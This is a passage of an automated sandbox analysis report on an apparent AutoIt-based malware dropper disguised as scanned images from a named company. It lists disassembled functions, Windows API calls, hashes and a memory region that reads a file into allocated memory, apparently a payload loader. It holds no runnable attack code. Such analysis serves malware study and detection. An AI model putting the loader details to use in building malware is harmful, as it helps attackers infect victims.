                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 1500180987-0
                                                        • Opcode ID: 0df842b29718ca439b22689e5bf91c5b2ed6876d989adf45b7e321fffde23e12
                                                        • Instruction ID: da844c0fdbe4cadc87fd0dd283cc2fa42f6d0045a65e1fc9b01170a9941c7f9c
                                                        • Opcode Fuzzy Hash: 0df842b29718ca439b22689e5bf91c5b2ed6876d989adf45b7e321fffde23e12
                                                        • Instruction Fuzzy Hash: ECC12FB1D00129AEDF21EFA5CD85AEFB7BDEF45300F0440AAF609E6151EB709A448F65
                                                        Function 00A23015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A23074
                                                        • RegisterClassExW.USER32(00000030), ref: 00A2309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A230AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00A230CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A230DC
                                                        • LoadIconW.USER32(000000A9), ref: 00A230F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A23101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 569f2acbe7806bf385e6e7bd12e90c77a74fc79bd9adbeaaba14a971745a1d8d
                                                        • Instruction ID: 2c9f7543ae50696c553bd341ac7edf794902d117649b6cb3927d0a33440b28bb
                                                        • Opcode Fuzzy Hash: 569f2acbe7806bf385e6e7bd12e90c77a74fc79bd9adbeaaba14a971745a1d8d
                                                        • Instruction Fuzzy Hash: 6E312AB1941349EFDB50DFE4E885BDDBBF0FB19350F10492AE590AA2A0D3B50582CF50
                                                        Function 00A23041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A23074
                                                        • RegisterClassExW.USER32(00000030), ref: 00A2309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A230AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00A230CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A230DC
                                                        • LoadIconW.USER32(000000A9), ref: 00A230F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A23101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: ce0301a560dcc227ee97793eafa4b174a35fc0361d503641ebadba2cc67aae20
                                                        • Instruction ID: 746d4e8ca1c834ab2bb01ab11abccceda25342803bf1d3b8c6e763c81db2bc6a
                                                        • Opcode Fuzzy Hash: ce0301a560dcc227ee97793eafa4b174a35fc0361d503641ebadba2cc67aae20
                                                        • Instruction Fuzzy Hash: 7E21C3B1D00259AFDB10DFE4E889BDDBBF4FB19750F00452AFA10AA2A0D7B145468F95
                                                        Function 00A271EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00A24864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00AE62F8,?,00A237C0,?), ref: 00A24882
                                                          • Part of subcall function 00A4074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A272C5), ref: 00A40771
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A27308
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A5ECF1
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A5ED32
                                                        • RegCloseKey.ADVAPI32(?), ref: 00A5ED70
                                                        • _wcscat.LIBCMT ref: 00A5EDC9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                        • API String ID: 2673923337-2727554177
                                                        • Opcode ID: 053a23dc6932b11406cf24d7494efedb336c4612f34f5c417cd095d8e4cc6d32
                                                        • Instruction ID: 4ff421ea5e3277ffcba03db146de8fb7ea5ab135a277cec6d6095ce24019b39f
                                                        • Opcode Fuzzy Hash: 053a23dc6932b11406cf24d7494efedb336c4612f34f5c417cd095d8e4cc6d32
                                                        • Instruction Fuzzy Hash: 7B716F714083419EC714DFA9ED8199FBBF8FF95340B84092EF5459B1A0EB309A4ACB62
                                                        Function 00A23A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00A23A62
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00A23A71
                                                        • LoadIconW.USER32(00000063), ref: 00A23A88
                                                        • LoadIconW.USER32(000000A4), ref: 00A23A9A
                                                        • LoadIconW.USER32(000000A2), ref: 00A23AAC
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A23AD2
                                                        • RegisterClassExW.USER32(?), ref: 00A23B28
                                                          • Part of subcall function 00A23041: GetSysColorBrush.USER32(0000000F), ref: 00A23074
                                                          • Part of subcall function 00A23041: RegisterClassExW.USER32(00000030), ref: 00A2309E
                                                          • Part of subcall function 00A23041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A230AF
                                                          • Part of subcall function 00A23041: InitCommonControlsEx.COMCTL32(?), ref: 00A230CC
                                                          • Part of subcall function 00A23041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A230DC
                                                          • Part of subcall function 00A23041: LoadIconW.USER32(000000A9), ref: 00A230F2
                                                          • Part of subcall function 00A23041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A23101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: 99795b771dee407297bda1b830b16b079fa0ce7ccba4fcb95905000b2863b73a
                                                        • Instruction ID: 671c0428a691f3cb883234a05e91922a54ae1196a66c3016979f6db1305f8faf
                                                        • Opcode Fuzzy Hash: 99795b771dee407297bda1b830b16b079fa0ce7ccba4fcb95905000b2863b73a
                                                        • Instruction Fuzzy Hash: BF214DB1D00354AFDB10DFE4EC89BDD7BB4FB18751F004529E604AA2E0D3B655568F54
                                                        Function 00A23633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 767 a23633-a23681 769 a23683-a23686 767->769 770 a236e1-a236e3 767->770 772 a236e7 769->772 773 a23688-a2368f 769->773 770->769 771 a236e5 770->771 774 a236ca-a236d2 DefWindowProcW 771->774 775 a5d31c-a5d34a call a311d0 call a311f3 772->775 776 a236ed-a236f0 772->776 777 a23695-a2369a 773->777 778 a2375d-a23765 PostQuitMessage 773->778 785 a236d8-a236de 774->785 814 a5d34f-a5d356 775->814 780 a236f2-a236f3 776->780 781 a23715-a2373c SetTimer RegisterWindowMessageW 776->781 782 a236a0-a236a2 777->782 783 a5d38f-a5d3a3 call a82a16 777->783 779 a23711-a23713 778->779 779->785 786 a5d2bf-a5d2c2 780->786 787 a236f9-a2370c KillTimer call a244cb call a23114 780->787 781->779 788 a2373e-a23749 CreatePopupMenu 781->788 789 a23767-a23776 call a24531 782->789 790 a236a8-a236ad 782->790 783->779 808 a5d3a9 783->808 794 a5d2c4-a5d2c6 786->794 795 a5d2f8-a5d317 MoveWindow 786->795 787->779 788->779 789->779 797 a5d374-a5d37b 790->797 798 a236b3-a236b8 790->798 802 a5d2e7-a5d2f3 SetFocus 794->802 803 a5d2c8-a5d2cb 794->803 795->779 797->774 805 a5d381-a5d38a call a7817e 797->805 806 a2374b-a2375b call a245df 798->806 807 a236be-a236c4 798->807 802->779 803->807 810 a5d2d1-a5d2e2 call a311d0 803->810 805->774 806->779 807->774 807->814 808->774 810->779 814->774 815 a5d35c-a5d36f call a244cb call a243db 814->815 815->774
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00A236D2
                                                        • KillTimer.USER32(?,00000001), ref: 00A236FC
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A2371F
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A2372A
                                                        • CreatePopupMenu.USER32 ref: 00A2373E
                                                        • PostQuitMessage.USER32(00000000), ref: 00A2375F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: 751d0ed28d0b3c641a9754f3b968f04a7b552ec6efa30da5fadff34d0d623110
                                                        • Instruction ID: fe4ac15de6be60cc559b7083bd794dfc0279537bb69c5b02ea3bc8aa24c579bc
                                                        • Opcode Fuzzy Hash: 751d0ed28d0b3c641a9754f3b968f04a7b552ec6efa30da5fadff34d0d623110
                                                        • Instruction Fuzzy Hash: CF415DB3100155BBDF24DFACFC49BBA3768EB16340F040939FA428A2E1DB799D029761
                                                        Function 00A23778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                        • API String ID: 1825951767-3513169116
                                                        • Opcode ID: 21875436901469cdbe8165d52ff49eaf7b79ed980fd77e2bf9e8823034393e01
                                                        • Instruction ID: 199d22e2ec42c7fdb09bb0cd108224a9c868f29aeee102ac0de082e883aee6e0
                                                        • Opcode Fuzzy Hash: 21875436901469cdbe8165d52ff49eaf7b79ed980fd77e2bf9e8823034393e01
                                                        • Instruction Fuzzy Hash: E1A16D72C10239AACF14EBA8ED92AEEB778BF15750F040539F412B7191DF349A09CB60
                                                        Function 016925E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 942 16925e0-169268e call 1690000 945 1692695-16926bb call 16934f0 CreateFileW 942->945 948 16926bd 945->948 949 16926c2-16926d2 945->949 950 169280d-1692811 948->950 957 16926d9-16926f3 VirtualAlloc 949->957 958 16926d4 949->958 951 1692853-1692856 950->951 952 1692813-1692817 950->952 954 1692859-1692860 951->954 955 1692819-169281c 952->955 956 1692823-1692827 952->956 961 1692862-169286d 954->961 962 16928b5-16928ca 954->962 955->956 963 1692829-1692833 956->963 964 1692837-169283b 956->964 959 16926fa-1692711 ReadFile 957->959 960 16926f5 957->960 958->950 965 1692718-1692758 VirtualAlloc 959->965 966 1692713 959->966 960->950 967 169286f 961->967 968 1692871-169287d 961->968 969 16928da-16928e2 962->969 970 16928cc-16928d7 VirtualFree 962->970 963->964 971 169284b 964->971 972 169283d-1692847 964->972 973 169275a 965->973 974 169275f-169277a call 1693740 965->974 966->950 967->962 975 169287f-169288f 968->975 976 1692891-169289d 968->976 970->969 971->951 972->971 973->950 982 1692785-169278f 974->982 978 16928b3 975->978 979 16928aa-16928b0 976->979 980 169289f-16928a8 976->980 978->954 979->978 980->978 983 1692791-16927c0 call 1693740 982->983 984 16927c2-16927d6 call 1693550 982->984 983->982 989 16927d8 984->989 990 16927da-16927de 984->990 989->950 992 16927ea-16927ee 990->992 993 16927e0-16927e4 FindCloseChangeNotification 990->993 994 16927fe-1692807 992->994 995 16927f0-16927fb VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 016926B1
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016928D7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1341240796.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1690000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                        • Instruction ID: 9598fa04688e0592dd3e0289954ed81fd3a630270851fba863ce6cb9a4b5cf4d
                                                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                        • Instruction Fuzzy Hash: CAA1E674E00209EBDF14DFA4C9A4BEEBBB9BF48304F20815DE501BB281D7759A45CB94
                                                        Function 00A239E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1073 a239e7-a23a57 CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A23A15
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A23A36
                                                        • ShowWindow.USER32(00000000,?,?), ref: 00A23A4A
                                                        • ShowWindow.USER32(00000000,?,?), ref: 00A23A53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: acf408648f1ced78998f2ca791b644299ce0dfe436d3efb737121697bb2770a6
                                                        • Instruction ID: 5e662e199ce4ee76919059e4f12a4ba54532ab0ced9b3fcccebc00d99d99fc81
                                                        • Opcode Fuzzy Hash: acf408648f1ced78998f2ca791b644299ce0dfe436d3efb737121697bb2770a6
                                                        • Instruction Fuzzy Hash: 2EF03070A002D07EEA3097936C88EB73E7DD7D7FA0B000429BA00A61B0C2A51842CB70
                                                        Function 016923B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1074 16923b0-16924d8 call 1690000 call 16922a0 CreateFileW 1081 16924da 1074->1081 1082 16924df-16924ef 1074->1082 1083 169258f-1692594 1081->1083 1085 16924f1 1082->1085 1086 16924f6-1692510 VirtualAlloc 1082->1086 1085->1083 1087 1692512 1086->1087 1088 1692514-169252b ReadFile 1086->1088 1087->1083 1089 169252d 1088->1089 1090 169252f-1692569 call 16922e0 call 16912a0 1088->1090 1089->1083 1095 169256b-1692580 call 1692330 1090->1095 1096 1692585-169258d ExitProcess 1090->1096 1095->1096 1096->1083
                                                        APIs
                                                          • Part of subcall function 016922A0: Sleep.KERNELBASE(000001F4), ref: 016922B1
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016924CE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1341240796.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1690000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: 81JNGYI70PUZT7Q5TUTIIB
                                                        • API String ID: 2694422964-4236348428
                                                        • Opcode ID: 74f2f45ebfff185a785d9a54a99a0eb52dc3ad378cbf1b433c3e3e1451dc5df5
                                                        • Instruction ID: a4ed28e640b72896388d5742b692917a0adea506ca5fb7bd2d0eb1bb85a213ec
                                                        • Opcode Fuzzy Hash: 74f2f45ebfff185a785d9a54a99a0eb52dc3ad378cbf1b433c3e3e1451dc5df5
                                                        • Instruction Fuzzy Hash: 65517F70D04289EBEF11DBA4CC64BEEBBB9AF15304F004199E6097B2C1D6B91B45CBA5
                                                        Function 00A2410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1098 a2410d-a24123 1099 a24200-a24204 1098->1099 1100 a24129-a2413e call a27b76 1098->1100 1103 a24144-a24164 call a27d2c 1100->1103 1104 a5d5dd-a5d5ec LoadStringW 1100->1104 1106 a5d5f7-a5d60f call a27c8e call a27143 1103->1106 1109 a2416a-a2416e 1103->1109 1104->1106 1116 a2417e-a241fb call a43020 call a2463e call a42ffc Shell_NotifyIconW call a25a64 1106->1116 1120 a5d615-a5d633 call a27e0b call a27143 call a27e0b 1106->1120 1110 a24174-a24179 call a27c8e 1109->1110 1111 a24205-a2420e call a281a7 1109->1111 1110->1116 1111->1116 1116->1099 1120->1116
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A5D5EC
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                        • _memset.LIBCMT ref: 00A2418D
                                                        • _wcscpy.LIBCMT ref: 00A241E1
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A241F1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 3942752672-1585850449
                                                        • Opcode ID: c624bcfecbc3726e1975111c627dc4469970c04cb3eef5e8514dd94daffee6be
                                                        • Instruction ID: 719ef68fc95678d8c6d499be4ccaddbca6b97b7336b09975443c44c2bb0c07be
                                                        • Opcode Fuzzy Hash: c624bcfecbc3726e1975111c627dc4469970c04cb3eef5e8514dd94daffee6be
                                                        • Instruction Fuzzy Hash: CE31F871408364AAD721EBA8ED46FDF77ECAF54300F104A2EF585960A1EB709749C793
                                                        Function 00A4564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1133 a4564d-a45666 1134 a45683 1133->1134 1135 a45668-a4566d 1133->1135 1136 a45685-a4568b 1134->1136 1135->1134 1137 a4566f-a45671 1135->1137 1138 a45673-a45678 call a48d68 1137->1138 1139 a4568c-a45691 1137->1139 1149 a4567e call a48ff6 1138->1149 1141 a45693-a4569d 1139->1141 1142 a4569f-a456a3 1139->1142 1141->1142 1144 a456c3-a456d2 1141->1144 1145 a456a5-a456b0 call a43020 1142->1145 1146 a456b3-a456b5 1142->1146 1147 a456d4-a456d7 1144->1147 1148 a456d9 1144->1148 1145->1146 1146->1138 1151 a456b7-a456c1 1146->1151 1152 a456de-a456e3 1147->1152 1148->1152 1149->1134 1151->1138 1151->1144 1155 a457cc-a457cf 1152->1155 1156 a456e9-a456f0 1152->1156 1155->1136 1157 a45731-a45733 1156->1157 1158 a456f2-a456fa 1156->1158 1160 a45735-a45737 1157->1160 1161 a4579d-a4579e call a50df7 1157->1161 1158->1157 1159 a456fc 1158->1159 1162 a45702-a45704 1159->1162 1163 a457fa 1159->1163 1164 a45739-a45741 1160->1164 1165 a4575b-a45766 1160->1165 1174 a457a3-a457a7 1161->1174 1169 a45706-a45708 1162->1169 1170 a4570b-a45710 1162->1170 1171 a457fe-a45807 1163->1171 1172 a45751-a45755 1164->1172 1173 a45743-a4574f 1164->1173 1167 a45768 1165->1167 1168 a4576a-a4576d 1165->1168 1167->1168 1177 a457d4-a457d8 1168->1177 1178 a4576f-a4577b call a44916 call a510ab 1168->1178 1169->1170 1170->1177 1179 a45716-a4572f call a50f18 1170->1179 1171->1136 1175 a45757-a45759 1172->1175 1173->1175 1174->1171 1176 a457a9-a457ae 1174->1176 1175->1168 1176->1177 1180 a457b0-a457c1 1176->1180 1181 a457ea-a457f5 call a48d68 1177->1181 1182 a457da-a457e7 call a43020 1177->1182 1194 a45780-a45785 1178->1194 1193 a45792-a4579b 1179->1193 1185 a457c4-a457c6 1180->1185 1181->1149 1182->1181 1185->1155 1185->1156 1193->1185 1195 a4580c-a45810 1194->1195 1196 a4578b-a4578e 1194->1196 1195->1171 1196->1163 1197 a45790 1196->1197 1197->1193
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
